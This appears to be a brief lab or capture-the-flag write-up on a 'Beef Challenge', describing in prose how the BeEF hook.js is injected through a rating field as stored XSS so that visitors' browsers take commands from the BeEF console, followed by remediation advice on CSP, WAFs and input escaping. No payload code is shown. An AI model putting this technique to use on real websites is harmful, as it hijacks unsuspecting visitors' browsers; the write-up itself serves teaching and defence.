Write-up to the Beef Challenge


XSS and Beef are to be tested.


  • Code can be injected in the rating text field. We inject the beef hook.js, which is executed by the victim when surfing the website.
  • Subsequently, commands can be issued in the Beef Console, which the victim then executes.

Vulnerability remediation

  • A CSP can help so that the victim does not connect to the hook.js file at all. This does not remove the vulnerability.
  • A WAF can help to detect such attempts (but does not remove the vulnerability).
  • User input must always be escaped / sanitized (Html entities) so that it is not executed.